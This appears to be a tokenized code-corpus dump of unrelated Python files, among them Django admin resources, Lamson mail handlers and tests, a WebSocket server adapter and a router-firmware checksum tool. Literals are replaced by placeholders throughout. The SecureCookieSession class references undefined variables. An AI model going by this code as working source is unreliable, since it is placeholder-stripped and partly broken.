<s> from django . conf . urls . defaults import patterns , url , include <EOL> from django import forms <EOL> from hyperadmin . apirequests import Namespace <EOL> from hyperadmin . resources . crud import CRUDResource <EOL> from hyperadmin . resources . models . indexes import ModelIndex , InlineIndex <EOL> from hyperadmin . resources . models . endpoints import ListEndpoint , CreateEndpoint , DetailEndpoint , DeleteEndpoint <EOL> from hyperadmin . resources . models . endpoints import InlineListEndpoint , InlineCreateEndpoint , InlineDetailEndpoint , InlineDeleteEndpoint <EOL> class BaseModelResource ( CRUDResource ) : <EOL> fields = None <EOL> exclude = [ ] <EOL> formfield_overrides = { } <EOL> inlines = [ ] <EOL> list_display_links = ( ) <EOL> list_filter = ( ) <EOL> list_select_related = False <EOL> list_per_page = <NUM_LIT:100> <EOL> list_max_show_all = <NUM_LIT:200> <EOL> list_editable = ( ) <EOL> search_fields = ( ) <EOL> date_hierarchy = None <EOL> @ property <EOL> def opts ( self ) : <EOL> return self . resource_adaptor . _meta <EOL> def get_app_name ( self ) : <EOL> return self . opts . app_label <EOL> def get_resource_name ( self ) : <EOL> return self . opts . module_name <EOL> def get_primary_query ( self , ** kwargs ) : <EOL> return self . get_queryset ( ) <EOL> def get_indexes ( self ) : <EOL> from hyperadmin . resources . models . filters import FieldFilter , SearchFilter <EOL> from django . db import models <EOL> from django . contrib . admin . util import get_fields_from_path <EOL> try : <EOL> from django . contrib . admin . util import lookup_needs_distinct <EOL> except ImportError : <EOL> from hyperadmin . resources . models . util import lookup_needs_distinct <EOL> indexes = { '<STR_LIT>' : ModelIndex ( '<STR_LIT>' , self ) } <EOL> index = ModelIndex ( '<STR_LIT>' , self ) <EOL> indexes [ '<STR_LIT>' ] = index <EOL> if self . list_filter : <EOL> for list_filter in self . 
list_filter : <EOL> use_distinct = False <EOL> if callable ( list_filter ) : <EOL> spec = list_filter ( index = index ) <EOL> else : <EOL> field_path = None <EOL> if isinstance ( list_filter , ( tuple , list ) ) : <EOL> field , field_list_filter_class = list_filter <EOL> else : <EOL> field , field_list_filter_class = list_filter , FieldFilter . create <EOL> if not isinstance ( field , models . Field ) : <EOL> field_path = field <EOL> field = get_fields_from_path ( self . model , field_path ) [ - <NUM_LIT:1> ] <EOL> spec = field_list_filter_class ( field , field_path = field_path , index = index ) <EOL> use_distinct = ( use_distinct or <EOL> lookup_needs_distinct ( self . opts , <EOL> field_path ) ) <EOL> if spec : <EOL> index . filters . append ( spec ) <EOL> if self . search_fields : <EOL> index . register_filter ( SearchFilter , search_fields = self . search_fields ) <EOL> '''<STR_LIT>''' <EOL> return indexes <EOL> def lookup_allowed ( self , lookup , value ) : <EOL> '''<STR_LIT>''' <EOL> return True <EOL> def get_queryset ( self ) : <EOL> queryset = self . resource_adaptor . objects . all ( ) <EOL> if not self . has_update_permission ( ) : <EOL> queryset = queryset . none ( ) <EOL> return queryset <EOL> def has_create_permission ( self ) : <EOL> user = self . api_request . user <EOL> if self . opts . auto_created : <EOL> return self . has_update_permission ( ) <EOL> return user . has_perm ( <EOL> self . opts . app_label + '<STR_LIT:.>' + self . opts . get_add_permission ( ) ) <EOL> def has_update_permission ( self , item = None ) : <EOL> user = self . api_request . user <EOL> if item : <EOL> obj = item . instance <EOL> else : <EOL> obj = None <EOL> opts = self . opts <EOL> if opts . auto_created and hasattr ( self , '<STR_LIT>' ) : <EOL> for field in opts . fields : <EOL> if field . rel and field . rel . to != self . parent_model : <EOL> opts = field . rel . to . _meta <EOL> break <EOL> return user . has_perm ( <EOL> opts . app_label + '<STR_LIT:.>' + opts . 
get_change_permission ( ) , obj ) <EOL> def has_delete_permission ( self , item = None ) : <EOL> user = self . api_request . user <EOL> if self . opts . auto_created : <EOL> return self . has_update_permission ( item ) <EOL> return user . has_perm ( <EOL> self . opts . app_label + '<STR_LIT:.>' + self . opts . get_delete_permission ( ) ) <EOL> def get_exclude ( self ) : <EOL> return self . exclude or [ ] <EOL> def get_form_class ( self ) : <EOL> if self . form_class : <EOL> return self . form_class <EOL> class AdminForm ( forms . ModelForm ) : <EOL> class Meta : <EOL> model = self . model <EOL> exclude = self . get_exclude ( ) <EOL> return AdminForm <EOL> def get_native_datatap_instream_from_items ( self , items ) : <EOL> '''<STR_LIT>''' <EOL> return [ item . instance for item in items ] <EOL> def get_native_datatap ( self , instream = None , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> from datatap . datataps import ModelDataTap <EOL> if instream is None : <EOL> instream = [ self . resource_adaptor ] <EOL> return ModelDataTap ( instream , ** kwargs ) <EOL> class ModelResource ( BaseModelResource ) : <EOL> list_endpoint = ( ListEndpoint , { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> create_endpoint = ( CreateEndpoint , { } ) <EOL> detail_endpoint = ( DetailEndpoint , { } ) <EOL> delete_endpoint = ( DeleteEndpoint , { } ) <EOL> def post_register ( self ) : <EOL> super ( ModelResource , self ) . post_register ( ) <EOL> self . initialize_inlines ( ) <EOL> @ property <EOL> def model ( self ) : <EOL> return self . resource_adaptor <EOL> def initialize_inlines ( self ) : <EOL> self . inline_instances = list ( ) <EOL> for inline_cls in self . inlines : <EOL> self . register_inline ( inline_cls ) <EOL> def register_inline ( self , inline_cls ) : <EOL> self . inline_instances . append ( inline_cls ( parent = self , api_request = self . api_request ) ) <EOL> def get_urls ( self ) : <EOL> urlpatterns = super ( ModelResource , self ) . get_urls ( ) <EOL> for inline in self . 
inline_instances : <EOL> urlpatterns += patterns ( '<STR_LIT>' , <EOL> url ( '<STR_LIT>' , include ( inline . urls ) ) <EOL> ) <EOL> return urlpatterns <EOL> def get_item_namespaces ( self , item ) : <EOL> assert self . api_request <EOL> namespaces = super ( ModelResource , self ) . get_item_namespaces ( item ) <EOL> for inline in self . inline_instances : <EOL> name = '<STR_LIT>' % inline . rel_name <EOL> assert inline . api_request <EOL> namespace = Namespace ( name = name , endpoint = inline , state_data = { '<STR_LIT>' : item } ) <EOL> assert '<STR_LIT>' in namespace . endpoint . state <EOL> namespace . link <EOL> namespaces [ name ] = namespace <EOL> return namespaces <EOL> class InlineModelResource ( BaseModelResource ) : <EOL> model = None <EOL> fk_name = None <EOL> rel_name = None <EOL> list_endpoint = ( InlineListEndpoint , { } ) <EOL> create_endpoint = ( InlineCreateEndpoint , { } ) <EOL> detail_endpoint = ( InlineDetailEndpoint , { } ) <EOL> delete_endpoint = ( InlineDeleteEndpoint , { } ) <EOL> def __init__ ( self , parent , ** kwargs ) : <EOL> kwargs [ '<STR_LIT>' ] = parent . site <EOL> kwargs [ '<STR_LIT>' ] = self . model <EOL> kwargs [ '<STR_LIT>' ] = parent <EOL> super ( InlineModelResource , self ) . __init__ ( ** kwargs ) <EOL> def post_register ( self ) : <EOL> from django . db . models . fields . related import RelatedObject <EOL> from django . forms . models import _get_foreign_key <EOL> self . fk = _get_foreign_key ( self . _parent . resource_adaptor , self . model , self . fk_name ) <EOL> if self . rel_name is None : <EOL> self . rel_name = RelatedObject ( self . fk . rel . to , self . model , self . fk ) . get_accessor_name ( ) <EOL> super ( InlineModelResource , self ) . post_register ( ) <EOL> def get_queryset ( self , parent ) : <EOL> queryset = self . resource_adaptor . objects . all ( ) <EOL> queryset = queryset . filter ( ** { self . fk . name : parent } ) <EOL> if not self . has_update_permission ( ) : <EOL> queryset = queryset . 
none ( ) <EOL> return queryset <EOL> def get_primary_query ( self , ** kwargs ) : <EOL> return self . get_queryset ( parent = self . state [ '<STR_LIT>' ] . instance ) <EOL> def get_indexes ( self ) : <EOL> return { '<STR_LIT>' : InlineIndex ( '<STR_LIT>' , self ) } <EOL> def get_base_url_name_suffix ( self ) : <EOL> assert self . rel_name is not None <EOL> return self . rel_name <EOL> def get_item_url ( self , item ) : <EOL> return self . link_prototypes [ '<STR_LIT>' ] . get_url ( item = item ) <EOL> def get_absolute_url ( self ) : <EOL> return self . link_prototypes [ '<STR_LIT:list>' ] . get_url ( ) <EOL> def get_breadcrumbs ( self ) : <EOL> breadcrumbs = self . parent . get_breadcrumbs ( ) <EOL> parent_item = self . state [ '<STR_LIT>' ] <EOL> breadcrumbs . append ( self . parent . get_item_breadcrumb ( parent_item ) ) <EOL> breadcrumbs . append ( self . get_breadcrumb ( ) ) <EOL> if self . state . item : <EOL> breadcrumbs . append ( self . get_item_breadcrumb ( self . state . item ) ) <EOL> return breadcrumbs <EOL> def get_form_class ( self ) : <EOL> if self . form_class : <EOL> return self . form_class <EOL> resource = self <EOL> class AdminForm ( forms . ModelForm ) : <EOL> state = self . state <EOL> def save ( self , commit = True ) : <EOL> instance = super ( AdminForm , self ) . save ( commit = False ) <EOL> setattr ( instance , resource . fk . name , self . state [ '<STR_LIT>' ] . instance ) <EOL> if commit : <EOL> instance . save ( ) <EOL> return instance <EOL> class Meta : <EOL> model = self . model <EOL> exclude = self . get_exclude ( ) + [ self . fk . name ] <EOL> return AdminForm <EOL> def get_ln_links ( self ) : <EOL> links = self . create_link_collection ( ) <EOL> if self . state . namespace : <EOL> for item in self . get_resource_items ( ) : <EOL> links . append ( self . link_prototypes [ '<STR_LIT>' ] . get_link ( item = item ) ) <EOL> return links <EOL> def get_idempotent_links ( self ) : <EOL> links = self . 
create_link_collection ( ) <EOL> if self . state . namespace : <EOL> for item in self . get_resource_items ( ) : <EOL> links . append ( self . link_prototypes [ '<STR_LIT>' ] . get_link ( item = item ) ) <EOL> return links </s>
<s> import os <EOL> try : <EOL> from setuptools import setup , find_packages <EOL> except ImportError : <EOL> from distutils . core import setup , find_packages <EOL> VERSION = '<STR_LIT>' <EOL> PATH = os . path . dirname ( os . path . abspath ( __file__ ) ) <EOL> try : <EOL> LONG_DESC = '<STR_LIT>' + open ( os . path . join ( PATH , '<STR_LIT>' ) , '<STR_LIT:r>' ) . read ( ) . split ( '<STR_LIT>' , <NUM_LIT:1> ) [ - <NUM_LIT:1> ] <EOL> except IOError : <EOL> LONG_DESC = '<STR_LIT>' <EOL> setup ( name = '<STR_LIT>' , <EOL> version = VERSION , <EOL> description = "<STR_LIT>" , <EOL> long_description = LONG_DESC , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> keywords = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> maintainer = '<STR_LIT>' , <EOL> maintainer_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> packages = find_packages ( exclude = [ '<STR_LIT>' ] ) , <EOL> test_suite = '<STR_LIT>' , <EOL> tests_require = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) , <EOL> install_requires = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> include_package_data = True , <EOL> zip_safe = False , <EOL> ) </s>
<s> import sys <EOL> """<STR_LIT>""" <EOL> class LibAcosChecksum ( object ) : <EOL> def __init__ ( self , data , data_len , checksum_offset = - <NUM_LIT:1> ) : <EOL> self . dword_623A0 = <NUM_LIT:0> <EOL> self . dword_623A4 = <NUM_LIT:0> <EOL> fake_checksum = "<STR_LIT>" <EOL> self . data = data [ <NUM_LIT:0> : data_len ] <EOL> if ( checksum_offset > - <NUM_LIT:1> ) : <EOL> self . data = ( self . data [ <NUM_LIT:0> : checksum_offset ] + <EOL> fake_checksum + <EOL> self . data [ checksum_offset + len ( fake_checksum ) : ] ) <EOL> self . _update ( self . data [ <NUM_LIT:0> : data_len ] ) <EOL> self . _finalize ( ) <EOL> def _update ( self , data ) : <EOL> size = len ( data ) <EOL> t0 = self . dword_623A0 <EOL> a0 = self . dword_623A4 <EOL> a2 = size <EOL> a3 = <NUM_LIT:0> <EOL> while a3 != a2 : <EOL> v1 = ord ( data [ a3 ] ) <EOL> a3 += <NUM_LIT:1> <EOL> a0 = ( a0 + v1 ) & <NUM_LIT> <EOL> t0 = ( t0 + a0 ) & <NUM_LIT> <EOL> self . dword_623A0 = t0 <EOL> self . dword_623A4 = a0 <EOL> return <NUM_LIT:1> <EOL> def _finalize ( self ) : <EOL> v0 = self . dword_623A0 <EOL> v1 = self . dword_623A4 <EOL> a0 = ( v0 & <NUM_LIT> ) <EOL> v0 = ( v0 >> <NUM_LIT:16> ) <EOL> v0 = ( v0 + a0 ) & <NUM_LIT> <EOL> a2 = ( v1 & <NUM_LIT> ) <EOL> v1 = ( v1 >> <NUM_LIT:16> ) <EOL> v1 = ( v1 + a2 ) & <NUM_LIT> <EOL> a1 = v0 >> <NUM_LIT:16> <EOL> a1 = ( a1 + v0 ) & <NUM_LIT> <EOL> a0 = v1 >> <NUM_LIT:16> <EOL> a1 = ( a1 & <NUM_LIT> ) <EOL> a0 = ( a0 + v1 ) & <NUM_LIT> <EOL> a0 = ( a0 & <NUM_LIT> ) <EOL> v0 = ( a1 << <NUM_LIT:16> ) & <NUM_LIT> <EOL> a2 = ( v0 | a0 ) <EOL> v0 = a2 <EOL> self . dword_623A4 = a0 <EOL> self . dword_623A0 = a1 <EOL> self . checksum = v0 <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> firmware = sys . argv [ <NUM_LIT:1> ] <EOL> size = int ( sys . argv [ <NUM_LIT:2> ] , <NUM_LIT:0> ) <EOL> data = open ( firmware , "<STR_LIT:rb>" ) . 
read ( ) <EOL> if size > len ( data ) : <EOL> raise Exception ( "<STR_LIT>" % ( size , len ( data ) ) ) <EOL> checksum = LibAcosChecksum ( data , size ) . checksum <EOL> print ( "<STR_LIT>" % checksum ) </s>
<s> from . base import BaseSession <EOL> import hashlib <EOL> from . utils import sign_payload , validate_payload , load_payload , dump_payload <EOL> from . globals import session_config <EOL> class SecureCookieSession ( BaseSession ) : <EOL> salt = '<STR_LIT>' <EOL> def __init__ ( self ) : <EOL> pass <EOL> def decode_session ( self , data ) : <EOL> validated , ret = validate_payload ( data ) <EOL> if validated : <EOL> return load_payload ( ret ) <EOL> return None <EOL> def encode_session ( self ) : <EOL> s = dump_payload ( data ) <EOL> return sign_payload ( s , session_config . get ( '<STR_LIT>' ) , salt ) <EOL> def open ( self , request ) : <EOL> value = request . get_cookie ( '<STR_LIT>' ) or '<STR_LIT>' <EOL> data = self . decode_session ( value ) or { } <EOL> self . update ( data ) <EOL> def save ( self , response ) : <EOL> data = self . encode_session ( dict ( self ) ) <EOL> response . set_cookie ( '<STR_LIT>' , data ) </s>
<s> from lamson import view , encoding , queue <EOL> from config import settings <EOL> def mail_to_you_is_bouncing ( message ) : <EOL> reason = message . bounce . error_for_humans ( ) <EOL> msg = view . respond ( locals ( ) , '<STR_LIT>' , <EOL> From = '<STR_LIT>' , <EOL> To = message . bounce . original [ '<STR_LIT:to>' ] , <EOL> Subject = "<STR_LIT>" ) <EOL> if message . bounce . report : <EOL> for report in message . bounce . report : <EOL> msg . attach ( '<STR_LIT>' , content_type = '<STR_LIT>' , data = encoding . to_string ( report ) , <EOL> disposition = '<STR_LIT>' ) <EOL> if message . bounce . notification : <EOL> msg . attach ( '<STR_LIT>' , content_type = '<STR_LIT>' , <EOL> data = encoding . to_string ( message . bounce . notification ) , <EOL> disposition = '<STR_LIT>' ) <EOL> return msg <EOL> def you_are_now_unbounced ( message ) : <EOL> msg = view . respond ( locals ( ) , '<STR_LIT>' , <EOL> From = '<STR_LIT>' , <EOL> To = message [ '<STR_LIT>' ] , <EOL> Subject = "<STR_LIT>" ) <EOL> return msg <EOL> def archive_bounce ( message ) : <EOL> qu = queue . Queue ( settings . BOUNCE_ARCHIVE ) <EOL> qu . push ( message ) </s>
from config import settings
from lamson import view
from lamson . routing import Router
from lamson . server import Relay
import jinja2
import logging
import logging . config
import os

# Boot module: imported for its side effects. Configures logging, the
# outbound relay, the handler router, and the Jinja2 template loader.
logging . config . fileConfig ( "<STR_LIT>" )

# Outbound SMTP relay; debug=0 disables smtplib protocol tracing.
settings . relay = Relay ( host = settings . relay_config [ '<STR_LIT:host>' ] ,
                          port = settings . relay_config [ '<STR_LIT:port>' ] , debug = <NUM_LIT:0> )
# No inbound receiver is started by this boot file.
settings . receiver = None

Router . defaults ( ** settings . router_defaults )
Router . load ( settings . handlers )
# Reload handler modules on each message; don't log handler exceptions.
Router . RELOAD = True
Router . LOG_EXCEPTIONS = False

# Templates are looked up inside the configured package/directory.
view . LOADER = jinja2 . Environment (
    loader = jinja2 . PackageLoader ( settings . template_config [ '<STR_LIT>' ] ,
                                     settings . template_config [ '<STR_LIT>' ] ) )
<s> """<STR_LIT>""" </s>
from lamson import queue , server , mail
from nose . tools import *
import shutil
import os
from mock import *
import mailbox

# Module-level switch: when True, test_push()/test_pop()/... exercise the
# SafeMaildir-backed queue instead of the plain one (see test_safe_maildir).
USE_SAFE = False


def setup ( ) :
    # Remove the on-disk queue directory so every test starts clean.
    if os . path . exists ( "<STR_LIT>" ) :
        shutil . rmtree ( "<STR_LIT>" )


def teardown ( ) :
    setup ( )


def test_push ( ) :
    """Push one message; returns the queue so other tests can reuse it."""
    q = queue . Queue ( "<STR_LIT>" , safe = USE_SAFE )
    q . clear ( )
    msg = mail . MailResponse ( To = "<STR_LIT>" , From = "<STR_LIT>" ,
                              Subject = "<STR_LIT>" , Body = "<STR_LIT>" )
    key = q . push ( msg )
    assert key , "<STR_LIT>"
    return q


def test_pop ( ) :
    # Relies on test_push() having queued exactly one message.
    q = test_push ( )
    key , msg = q . pop ( )
    assert key , "<STR_LIT>"
    assert msg , "<STR_LIT>" % key
    assert msg [ '<STR_LIT:to>' ] == "<STR_LIT>"
    assert msg [ '<STR_LIT>' ] == "<STR_LIT>"
    assert msg [ '<STR_LIT>' ] == "<STR_LIT>"
    assert msg . body ( ) == "<STR_LIT>"
    # pop() removes the message; the queue must now be empty.
    assert q . count ( ) == <NUM_LIT:0> , "<STR_LIT>"
    assert not q . pop ( ) [ <NUM_LIT:0> ]


def test_get ( ) :
    q = test_push ( )
    msg = mail . MailResponse ( To = "<STR_LIT>" , From = "<STR_LIT>" ,
                              Subject = "<STR_LIT>" , Body = "<STR_LIT>" )
    key = q . push ( str ( msg ) )
    assert key , "<STR_LIT>"
    # get() retrieves by key without removing the message.
    msg = q . get ( key )
    assert msg , "<STR_LIT>" % key


def test_remove ( ) :
    q = test_push ( )
    msg = mail . MailResponse ( To = "<STR_LIT>" , From = "<STR_LIT>" ,
                              Subject = "<STR_LIT>" , Body = "<STR_LIT>" )
    key = q . push ( str ( msg ) )
    assert key , "<STR_LIT>"
    assert q . count ( ) == <NUM_LIT:2> , "<STR_LIT>" % q . count ( )
    q . remove ( key )
    assert q . count ( ) == <NUM_LIT:1> , "<STR_LIT>" % q . count ( )


def test_safe_maildir ( ) :
    # Re-run the basic suite against the SafeMaildir implementation.
    # NOTE(review): USE_SAFE is never reset to False afterwards — later
    # tests in the same run inherit the safe queue; confirm intended.
    global USE_SAFE
    USE_SAFE = True
    test_push ( )
    test_pop ( )
    test_get ( )
    test_remove ( )


def test_oversize_protections ( ) :
    """Messages above pop_limit are dropped, or diverted to oversize_dir."""
    overq = queue . Queue ( "<STR_LIT>" , pop_limit = <NUM_LIT:10> )
    overq . clear ( )
    for i in range ( <NUM_LIT:5> ) :
        overq . push ( "<STR_LIT>" * <NUM_LIT:100> )
    assert_equal ( overq . count ( ) , <NUM_LIT:5> )
    # Popping an oversize message returns nothing and purges the queue.
    key , msg = overq . pop ( )
    assert not key and not msg , "<STR_LIT>"
    assert_equal ( overq . count ( ) , <NUM_LIT:0> )
    setup ( )
    # With oversize_dir set, oversize messages are moved instead of dropped.
    overq = queue . Queue ( "<STR_LIT>" , pop_limit = <NUM_LIT:10> , oversize_dir = "<STR_LIT>" )
    moveq = queue . Queue ( "<STR_LIT>" )
    for i in range ( <NUM_LIT:5> ) :
        overq . push ( "<STR_LIT>" * <NUM_LIT:100> )
        key , msg = overq . pop ( )
        assert not key and not msg , "<STR_LIT>"
    assert_equal ( overq . count ( ) , <NUM_LIT:0> )
    assert_equal ( moveq . count ( ) , <NUM_LIT:5> )
    moveq . clear ( )
    overq . clear ( )


@ patch ( '<STR_LIT>' , new = Mock ( ) )
@ raises ( mailbox . ExternalClashError )
def test_SafeMaildir_name_clash ( ) :
    # With the uniqueness source mocked out, a second add must clash.
    try :
        shutil . rmtree ( "<STR_LIT>" )
    except : pass
    sq = queue . SafeMaildir ( '<STR_LIT>' )
    sq . add ( "<STR_LIT>" )


def raise_OSError ( * x , ** kw ) :
    # Helper side_effect: raise an OSError with a benign errno of 0.
    err = OSError ( '<STR_LIT>' )
    err . errno = <NUM_LIT:0>
    raise err


@ patch ( '<STR_LIT>' , new = Mock ( ) )
@ raises ( OSError )
def test_SafeMaildir_throws_errno_failure ( ) :
    setup ( )
    mailbox . _create_carefully . side_effect = raise_OSError
    sq = queue . SafeMaildir ( '<STR_LIT>' )
    sq . add ( "<STR_LIT>" )


@ patch ( '<STR_LIT>' , new = Mock ( ) )
@ raises ( OSError )
def test_SafeMaildir_reraise_weird_errno ( ) :
    # An OSError with an unexpected errno must propagate unchanged.
    try :
        shutil . rmtree ( "<STR_LIT>" )
    except : pass
    os . stat . side_effect = raise_OSError
    sq = queue . SafeMaildir ( '<STR_LIT>' )
    sq . add ( '<STR_LIT>' )
import logging
from bottle import ServerAdapter
from gevent import pywsgi
from geventwebsocket . handler import WebSocketHandler
from geventwebsocket . logging import create_logger


class GeventWebSocketServer ( ServerAdapter ) :
    """Bottle server adapter serving WSGI over gevent with WebSocket support."""

    def run ( self , handler ) :
        # WebSocketHandler upgrades eligible requests to WebSocket connections.
        wsgi_server = pywsgi . WSGIServer (
            ( self . host , self . port ) , handler ,
            handler_class = WebSocketHandler )
        if not self . quiet :
            # Wire up an INFO-level stream logger unless quiet mode is on.
            log = create_logger ( '<STR_LIT>' )
            log . setLevel ( logging . INFO )
            log . addHandler ( logging . StreamHandler ( ) )
            wsgi_server . logger = log
        wsgi_server . serve_forever ( )
from django . contrib import admin
from django . core . urlresolvers import reverse
from django . utils . safestring import mark_safe
from authorizenet . models import ( Response , CIMResponse , CustomerProfile ,
    CustomerPaymentProfile )
from authorizenet . forms import CustomerPaymentForm , CustomerPaymentAdminForm
from relatives . utils import object_edit_link


class ResponseAdmin ( admin . ModelAdmin ) :
    """Read-only admin for raw Authorize.NET transaction responses."""
    list_display = [ '<STR_LIT>' ,
                     '<STR_LIT>' ,
                     '<STR_LIT>' ,
                     '<STR_LIT>' ]
    # Gateway responses are immutable records: every field is read-only.
    readonly_fields = [ '<STR_LIT>' ,
                        '<STR_LIT>' ,
                        '<STR_LIT>' ,
                        '<STR_LIT>' ,
                        '<STR_LIT>' ,
                        '<STR_LIT>' ,
                        '<STR_LIT>' ,
                        '<STR_LIT>' ,
                        '<STR_LIT:description>' ,
                        '<STR_LIT>' ,
                        '<STR_LIT>' ,
                        '<STR_LIT:type>' ,
                        '<STR_LIT>' ,
                        '<STR_LIT>' ,
                        '<STR_LIT>' ,
                        '<STR_LIT>' ,
                        '<STR_LIT:address>' ,
                        '<STR_LIT>' ,
                        '<STR_LIT:state>' ,
                        '<STR_LIT>' ,
                        '<STR_LIT>' ,
                        '<STR_LIT>' ,
                        '<STR_LIT>' ,
                        '<STR_LIT:email>' ,
                        '<STR_LIT>' ,
                        '<STR_LIT>' ,
                        '<STR_LIT>' ,
                        '<STR_LIT>' ,
                        '<STR_LIT>' ,
                        '<STR_LIT>' ,
                        '<STR_LIT>' ,
                        '<STR_LIT>' ,
                        '<STR_LIT>' ,
                        '<STR_LIT>' ,
                        '<STR_LIT>' ,
                        '<STR_LIT>' ,
                        '<STR_LIT>' ,
                        '<STR_LIT>' ,
                        '<STR_LIT>' ,
                        '<STR_LIT>' ,
                        '<STR_LIT>' ,
                        '<STR_LIT>' ,
                        '<STR_LIT>' ,
                        '<STR_LIT>' ,
                        '<STR_LIT>' ,
                        '<STR_LIT>' ]

admin . site . register ( Response , ResponseAdmin )


class CIMResponseAdmin ( admin . ModelAdmin ) :
    """Read-only admin for CIM API responses, linking to the raw Response."""
    list_display = [ '<STR_LIT>' ,
                     '<STR_LIT:result>' ]
    readonly_fields = [ '<STR_LIT:result>' ,
                        '<STR_LIT>' ,
                        '<STR_LIT>' ,
                        '<STR_LIT>' ,
                        '<STR_LIT>' ]
    exclude = [ '<STR_LIT>' ]

    def response_link ( self , obj ) :
        # Render a link to the related transaction response's change page.
        change_url = reverse ( '<STR_LIT>' ,
                               args = ( obj . transaction_response . id , ) )
        return mark_safe ( '<STR_LIT>' % ( change_url ,
                                            obj . transaction_response ) )
    response_link . short_description = '<STR_LIT>'

admin . site . register ( CIMResponse , CIMResponseAdmin )


class CustomerPaymentProfileInline ( admin . TabularInline ) :
    """Read-only inline of payment profiles on the customer profile page."""
    model = CustomerPaymentProfile
    form = CustomerPaymentForm
    fields = [ object_edit_link ( "<STR_LIT>" ) , '<STR_LIT>' , '<STR_LIT>' ,
               '<STR_LIT>' , '<STR_LIT>' ]
    readonly_fields = fields
    # No blank rows, no adding, no deleting from the inline.
    extra = <NUM_LIT:0>
    max_num = <NUM_LIT:0>
    can_delete = False


class CustomerProfileAdmin ( admin . ModelAdmin ) :
    list_display = [ '<STR_LIT>' , '<STR_LIT>' ]
    readonly_fields = [ '<STR_LIT>' , '<STR_LIT>' ]
    inlines = [ CustomerPaymentProfileInline ]

    def get_readonly_fields ( self , request , obj = None ) :
        # Existing profiles are fully read-only; on creation only one
        # field is locked.
        return self . readonly_fields if obj is not None else [ '<STR_LIT>' ]

admin . site . register ( CustomerProfile , CustomerProfileAdmin )


class CustomerPaymentProfileAdmin ( admin . ModelAdmin ) :
    list_display = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ]
    readonly_fields = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ]
    form = CustomerPaymentAdminForm

    def get_readonly_fields ( self , request , obj = None ) :
        # All fields editable while creating; locked once saved.
        return self . readonly_fields if obj is not None else [ ]

admin . site . register ( CustomerPaymentProfile , CustomerPaymentProfileAdmin )
from django . conf . urls import url , include , patterns
from django . conf import settings
from django . views . generic . base import RedirectView
from django . contrib . staticfiles . urls import staticfiles_urlpatterns
from django . contrib import admin

# Discover admin.py modules in installed apps.
admin . autodiscover ( )

# Root URLconf: a redirect, two named views, several included app URLconfs,
# the admin site, and a media-serving view rooted at MEDIA_ROOT.
urlpatterns = patterns ( '<STR_LIT>' ,
    url ( r'<STR_LIT>' , RedirectView . as_view ( url = '<STR_LIT>' ) ) ,
    url ( r'<STR_LIT>' , '<STR_LIT>' , name = "<STR_LIT>" ) ,
    url ( r'<STR_LIT>' , '<STR_LIT>' , name = "<STR_LIT>" ) ,
    url ( r'<STR_LIT>' , include ( '<STR_LIT>' ) ) ,
    url ( r'<STR_LIT>' , include ( '<STR_LIT>' ) ) ,
    url ( r'<STR_LIT>' , include ( '<STR_LIT>' ) ) ,
    url ( r'<STR_LIT>' , include ( admin . site . urls ) ) ,
    url ( r'<STR_LIT>' , '<STR_LIT>' , { '<STR_LIT>' : settings . MEDIA_ROOT } ) ,
)
# Serve collected static files (development helper).
urlpatterns += staticfiles_urlpatterns ( )
<s> import unittest <EOL> from zencoder import Zencoder <EOL> from mock import patch <EOL> from test_util import TEST_API_KEY , load_response <EOL> from zencoder import Zencoder <EOL> class TestOutputs ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . zen = Zencoder ( api_key = TEST_API_KEY ) <EOL> @ patch ( "<STR_LIT>" ) <EOL> def test_output_details ( self , get ) : <EOL> get . return_value = load_response ( <NUM_LIT:200> , '<STR_LIT>' ) <EOL> resp = self . zen . output . details ( <NUM_LIT> ) <EOL> self . assertEquals ( resp . code , <NUM_LIT:200> ) <EOL> self . assertTrue ( resp . body [ '<STR_LIT:id>' ] > <NUM_LIT:0> ) <EOL> @ patch ( "<STR_LIT>" ) <EOL> def test_output_progress ( self , get ) : <EOL> get . return_value = load_response ( <NUM_LIT:200> , '<STR_LIT>' ) <EOL> resp = self . zen . output . progress ( <NUM_LIT> ) <EOL> self . assertEquals ( resp . code , <NUM_LIT:200> ) <EOL> self . assertEquals ( resp . body [ '<STR_LIT:state>' ] , '<STR_LIT>' ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
import sys
import os
from sphinx . ext import autodoc

# Sphinx configuration module; mid-file imports are conventional here
# because project code must be importable for autodoc/version lookup.
sys . path . insert ( <NUM_LIT:0> , os . path . abspath ( '<STR_LIT:..>' ) )
needs_sphinx = '<STR_LIT>'
extensions = [
    '<STR_LIT>' ,
    '<STR_LIT>' ,
    '<STR_LIT>' ,
]
intersphinx_mapping = { '<STR_LIT>' : ( '<STR_LIT>' , None ) }
templates_path = [ '<STR_LIT>' ]
source_suffix = '<STR_LIT>'
master_doc = '<STR_LIT:index>'
project = u'<STR_LIT>'
copyright = u'<STR_LIT>'

# Version/release come straight from the package being documented.
import zvshlib
version = zvshlib . __version__
release = version

exclude_patterns = [ '<STR_LIT>' ]
pygments_style = '<STR_LIT>'

# HTML theme supplied by the zerovm_sphinx_theme package.
html_theme = '<STR_LIT>'
from zerovm_sphinx_theme import theme_path
html_theme_path = [ theme_path ]
htmlhelp_basename = '<STR_LIT>'

latex_elements = {
}
latex_documents = [
    ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' ,
      u'<STR_LIT>' , '<STR_LIT>' ) ,
]
man_pages = [
